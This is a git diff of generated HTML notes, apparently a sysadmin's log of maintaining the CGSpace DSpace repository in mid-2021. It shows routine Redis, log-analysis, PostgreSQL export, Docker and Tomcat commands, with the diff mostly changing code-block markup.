</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> | sed -e &#39;s/^bull/HGET bull/&#39; -e &#39;s/\([[:digit:]]\)$/\1 name/&#39; \
</span></span><span style="display:flex;"><span> | ncat -w 3 localhost 6379 \
</span></span><span style="display:flex;"><span> | grep -v -E &#39;^\$&#39; | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 3 dspace_health_check
</span></span><span style="display:flex;"><span> 4 -ERR wrong number of arguments for &#39;hget&#39; command
</span></span><span style="display:flex;"><span> 12 mel_downloads_and_views
</span></span><span style="display:flex;"><span> 129 dspace_altmetrics
</span></span><span style="display:flex;"><span> 932 dspace_downloads_and_views
</span></span><span style="display:flex;"><span> 186428 dspace_add_missing_items
</span></span></code></pre></div><ul>
<li>Note that this uses <code>ncat</code> to send commands directly to redis all at once instead of one at a time (<code>netcat</code> didn&rsquo;t work here, as it doesn&rsquo;t know when our input is finished and never quits)
<ul>
<li>I thought of using <code>redis-cli --pipe</code> but then you have to construct the commands in the redis protocol format with the number of args and length of each command</li>
@ -544,49 +544,49 @@ hash
<ul>
<li>Looking at the DSpace log I see there was definitely a higher number of sessions that day, perhaps twice the normal:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ <span style="color:#66d9ef">for</span> file in dspace.log.2021-06-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span>; grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
dspace.log.2021-06-10
19072
dspace.log.2021-06-11
19224
dspace.log.2021-06-12
19215
dspace.log.2021-06-13
16721
dspace.log.2021-06-14
17880
dspace.log.2021-06-15
12103
dspace.log.2021-06-16
4651
dspace.log.2021-06-17
22785
dspace.log.2021-06-18
21406
dspace.log.2021-06-19
25967
dspace.log.2021-06-20
20850
dspace.log.2021-06-21
6388
dspace.log.2021-06-22
5945
dspace.log.2021-06-23
46371
dspace.log.2021-06-24
9024
dspace.log.2021-06-25
12521
dspace.log.2021-06-26
16163
dspace.log.2021-06-27
5886
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> file in dspace.log.2021-06-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span>; grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>dspace.log.2021-06-10
</span></span><span style="display:flex;"><span>19072
</span></span><span style="display:flex;"><span>dspace.log.2021-06-11
</span></span><span style="display:flex;"><span>19224
</span></span><span style="display:flex;"><span>dspace.log.2021-06-12
</span></span><span style="display:flex;"><span>19215
</span></span><span style="display:flex;"><span>dspace.log.2021-06-13
</span></span><span style="display:flex;"><span>16721
</span></span><span style="display:flex;"><span>dspace.log.2021-06-14
</span></span><span style="display:flex;"><span>17880
</span></span><span style="display:flex;"><span>dspace.log.2021-06-15
</span></span><span style="display:flex;"><span>12103
</span></span><span style="display:flex;"><span>dspace.log.2021-06-16
</span></span><span style="display:flex;"><span>4651
</span></span><span style="display:flex;"><span>dspace.log.2021-06-17
</span></span><span style="display:flex;"><span>22785
</span></span><span style="display:flex;"><span>dspace.log.2021-06-18
</span></span><span style="display:flex;"><span>21406
</span></span><span style="display:flex;"><span>dspace.log.2021-06-19
</span></span><span style="display:flex;"><span>25967
</span></span><span style="display:flex;"><span>dspace.log.2021-06-20
</span></span><span style="display:flex;"><span>20850
</span></span><span style="display:flex;"><span>dspace.log.2021-06-21
</span></span><span style="display:flex;"><span>6388
</span></span><span style="display:flex;"><span>dspace.log.2021-06-22
</span></span><span style="display:flex;"><span>5945
</span></span><span style="display:flex;"><span>dspace.log.2021-06-23
</span></span><span style="display:flex;"><span>46371
</span></span><span style="display:flex;"><span>dspace.log.2021-06-24
</span></span><span style="display:flex;"><span>9024
</span></span><span style="display:flex;"><span>dspace.log.2021-06-25
</span></span><span style="display:flex;"><span>12521
</span></span><span style="display:flex;"><span>dspace.log.2021-06-26
</span></span><span style="display:flex;"><span>16163
</span></span><span style="display:flex;"><span>dspace.log.2021-06-27
</span></span><span style="display:flex;"><span>5886
</span></span></code></pre></div><ul>
<li>I see 15,000 unique IPs in the XMLUI logs alone on that day:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
15835
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>15835
</span></span></code></pre></div><ul>
<li>Annoyingly I found 37,000 more hits from Bing using <code>dns:*msnbot* AND dns:*.msn.com.</code> as a Solr filter
<ul>
<li>WTF, they are using a normal user agent: <code>Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</code></li>
@ -628,8 +628,8 @@ dspace.log.2021-06-27
</li>
<li>The DSpace log shows:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</span></span></code></pre></div><ul>
<li>The first one of these I see is from last night at 2021-06-29 at 10:47 PM</li>
<li>I restarted Tomcat 7 and CGSpace came back up&hellip;</li>
<li>I didn&rsquo;t see that Atmire had responded last week (on 2021-06-23) about the issues we had
@ -641,14 +641,14 @@ dspace.log.2021-06-27
</li>
<li>Export a list of all CGSpace&rsquo;s AGROVOC keywords with counts for Enrico and Elizabeth Arnaud to discuss with AGROVOC:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value AS &#34;dcterms.subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY &#34;dcterms.subject&#34; ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
COPY 20780
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value AS &#34;dcterms.subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY &#34;dcterms.subject&#34; ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20780
</span></span></code></pre></div><ul>
<li>Actually Enrico wanted NON AGROVOC, so I extracted all the center and CRP subjects (ignoring system office and themes):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
COPY 1710
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1710
</span></span></code></pre></div><ul>
<li>Fix an issue in the Ansible infrastructure playbooks for the DSpace role
<ul>
<li>It was causing the template module to fail when setting up the npm environment</li>
@ -657,13 +657,13 @@ COPY 1710
</li>
<li>I saw a strange message in the Tomcat 7 journal on DSpace Test (linode26):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
</span></span></code></pre></div><ul>
<li>What&rsquo;s even crazier is that it is twice that on CGSpace (linode18)!</li>
<li>Apparently OpenJDK defaults to using <code>/dev/random</code> (see <code>/etc/java-8-openjdk/security/java.security</code>):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">securerandom.source=file:/dev/urandom
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>securerandom.source=file:/dev/urandom
</span></span></code></pre></div><ul>
<li><code>/dev/random</code> blocks and can take a long time to get entropy, and urandom on modern Linux is a cryptographically secure pseudorandom number generator
<ul>
<li>Now Tomcat starts much faster and no warning is printed so I&rsquo;m going to add this to our Ansible infrastructure playbooks</li>

View File

@ -30,7 +30,7 @@ Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVO
localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -120,17 +120,17 @@ COPY 20994
<ul>
<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
</code></pre></div><h2 id="2021-07-04">2021-07-04</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div><h2 id="2021-07-04">2021-07-04</h2>
<ul>
<li>Update all Docker containers on the AReS server (linode20) and rebuild OpenRXV:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cd OpenRXV
$ docker-compose -f docker/docker-compose.yml down
$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose -f docker/docker-compose.yml build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cd OpenRXV
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
</span></span><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml build
</span></span></code></pre></div><ul>
<li>Then run all system updates and reboot the server</li>
<li>After the server came back up I cloned the <code>openrxv-items-final</code> index to <code>openrxv-items-temp</code> and started the plugins
<ul>
@ -172,27 +172,27 @@ $ docker-compose -f docker/docker-compose.yml build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
Purging 95 hits from Drupal in statistics
Purging 38 hits from DTS Agent in statistics
Purging 601 hits from Microsoft Office Existence Discovery in statistics
Purging 51 hits from Site24x7 in statistics
Purging 62 hits from Trello in statistics
Purging 13574 hits from WhatsApp in statistics
Purging 144 hits from FlipboardProxy in statistics
Purging 37 hits from LinkWalker in statistics
Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
Purging 427 hits from WordPress in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 15030
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
</span></span><span style="display:flex;"><span>Purging 95 hits from Drupal in statistics
</span></span><span style="display:flex;"><span>Purging 38 hits from DTS Agent in statistics
</span></span><span style="display:flex;"><span>Purging 601 hits from Microsoft Office Existence Discovery in statistics
</span></span><span style="display:flex;"><span>Purging 51 hits from Site24x7 in statistics
</span></span><span style="display:flex;"><span>Purging 62 hits from Trello in statistics
</span></span><span style="display:flex;"><span>Purging 13574 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span>Purging 144 hits from FlipboardProxy in statistics
</span></span><span style="display:flex;"><span>Purging 37 hits from LinkWalker in statistics
</span></span><span style="display:flex;"><span>Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
</span></span><span style="display:flex;"><span>Purging 427 hits from WordPress in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 15030
</span></span></code></pre></div><ul>
<li>Meet with the CGIARAGROVOC task group to discuss how we want to do the workflow for submitting new terms to AGROVOC</li>
<li>I extracted another list of all subjects to check against AGROVOC:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">\COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-07-06-all-subjects.csv | sed 1d &gt; /tmp/2021-07-06-all-subjects.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>\COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-07-06-all-subjects.csv | sed 1d &gt; /tmp/2021-07-06-all-subjects.txt
</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
</span></span></code></pre></div><ul>
<li>Test <a href="https://github.com/DSpace/DSpace/pull/3162">Hrafn Malmquist&rsquo;s proposed DBCP2 changes</a> for DSpace 6.4 (DS-4574)
<ul>
<li>His changes reminded me that we can perhaps switch back to using this pooling instead of Tomcat 7&rsquo;s JDBC pooling via JNDI</li>
@ -205,84 +205,84 @@ $ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-0
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
2021-06-10
10693
2021-06-11
10587
2021-06-12
7958
2021-06-13
7681
2021-06-14
12639
2021-06-15
15388
2021-06-16
12245
2021-06-17
11187
2021-06-18
9684
2021-06-19
7835
2021-06-20
7198
2021-06-21
10380
2021-06-22
10255
2021-06-23
15878
2021-06-24
9963
2021-06-25
9439
2021-06-26
7930
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>2021-06-10
</span></span><span style="display:flex;"><span>10693
</span></span><span style="display:flex;"><span>2021-06-11
</span></span><span style="display:flex;"><span>10587
</span></span><span style="display:flex;"><span>2021-06-12
</span></span><span style="display:flex;"><span>7958
</span></span><span style="display:flex;"><span>2021-06-13
</span></span><span style="display:flex;"><span>7681
</span></span><span style="display:flex;"><span>2021-06-14
</span></span><span style="display:flex;"><span>12639
</span></span><span style="display:flex;"><span>2021-06-15
</span></span><span style="display:flex;"><span>15388
</span></span><span style="display:flex;"><span>2021-06-16
</span></span><span style="display:flex;"><span>12245
</span></span><span style="display:flex;"><span>2021-06-17
</span></span><span style="display:flex;"><span>11187
</span></span><span style="display:flex;"><span>2021-06-18
</span></span><span style="display:flex;"><span>9684
</span></span><span style="display:flex;"><span>2021-06-19
</span></span><span style="display:flex;"><span>7835
</span></span><span style="display:flex;"><span>2021-06-20
</span></span><span style="display:flex;"><span>7198
</span></span><span style="display:flex;"><span>2021-06-21
</span></span><span style="display:flex;"><span>10380
</span></span><span style="display:flex;"><span>2021-06-22
</span></span><span style="display:flex;"><span>10255
</span></span><span style="display:flex;"><span>2021-06-23
</span></span><span style="display:flex;"><span>15878
</span></span><span style="display:flex;"><span>2021-06-24
</span></span><span style="display:flex;"><span>9963
</span></span><span style="display:flex;"><span>2021-06-25
</span></span><span style="display:flex;"><span>9439
</span></span><span style="display:flex;"><span>2021-06-26
</span></span><span style="display:flex;"><span>7930
</span></span></code></pre></div><ul>
<li>Similarly, the number of connections to the REST API was around the average for the recent weeks before:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/rest.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
2021-06-10
1183
2021-06-11
1074
2021-06-12
911
2021-06-13
892
2021-06-14
1320
2021-06-15
1257
2021-06-16
1208
2021-06-17
1119
2021-06-18
965
2021-06-19
985
2021-06-20
854
2021-06-21
1098
2021-06-22
1028
2021-06-23
1375
2021-06-24
1135
2021-06-25
969
2021-06-26
904
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/rest.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>2021-06-10
</span></span><span style="display:flex;"><span>1183
</span></span><span style="display:flex;"><span>2021-06-11
</span></span><span style="display:flex;"><span>1074
</span></span><span style="display:flex;"><span>2021-06-12
</span></span><span style="display:flex;"><span>911
</span></span><span style="display:flex;"><span>2021-06-13
</span></span><span style="display:flex;"><span>892
</span></span><span style="display:flex;"><span>2021-06-14
</span></span><span style="display:flex;"><span>1320
</span></span><span style="display:flex;"><span>2021-06-15
</span></span><span style="display:flex;"><span>1257
</span></span><span style="display:flex;"><span>2021-06-16
</span></span><span style="display:flex;"><span>1208
</span></span><span style="display:flex;"><span>2021-06-17
</span></span><span style="display:flex;"><span>1119
</span></span><span style="display:flex;"><span>2021-06-18
</span></span><span style="display:flex;"><span>965
</span></span><span style="display:flex;"><span>2021-06-19
</span></span><span style="display:flex;"><span>985
</span></span><span style="display:flex;"><span>2021-06-20
</span></span><span style="display:flex;"><span>854
</span></span><span style="display:flex;"><span>2021-06-21
</span></span><span style="display:flex;"><span>1098
</span></span><span style="display:flex;"><span>2021-06-22
</span></span><span style="display:flex;"><span>1028
</span></span><span style="display:flex;"><span>2021-06-23
</span></span><span style="display:flex;"><span>1375
</span></span><span style="display:flex;"><span>2021-06-24
</span></span><span style="display:flex;"><span>1135
</span></span><span style="display:flex;"><span>2021-06-25
</span></span><span style="display:flex;"><span>969
</span></span><span style="display:flex;"><span>2021-06-26
</span></span><span style="display:flex;"><span>904
</span></span></code></pre></div><ul>
<li>According to goaccess, the traffic spike started at 2AM (remember that the first &ldquo;Pool empty&rdquo; error in dspace.log was at 4:01AM):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat /var/log/nginx/access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz /var/log/nginx/library-access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz | grep -E <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat /var/log/nginx/access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz /var/log/nginx/library-access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz | grep -E <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</span></span></code></pre></div><ul>
<li>Moayad sent a fix for the add missing items plugins issue (<a href="https://github.com/ilri/OpenRXV/pull/107">#107</a>)
<ul>
<li>It works MUCH faster because it correctly identifies the missing handles in each repository</li>
@ -311,19 +311,19 @@ $ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-0
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2302
postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2564
postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2530
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
</span></span><span style="display:flex;"><span>2302
</span></span><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
</span></span><span style="display:flex;"><span>2564
</span></span><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
</span></span><span style="display:flex;"><span>2530
</span></span></code></pre></div><ul>
<li>The locks are held by XMLUI, not REST API or OAI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi)&#39; | sort | uniq -c | sort -n
57 dspaceApi
2671 dspaceWeb
</code></pre></div><ul>
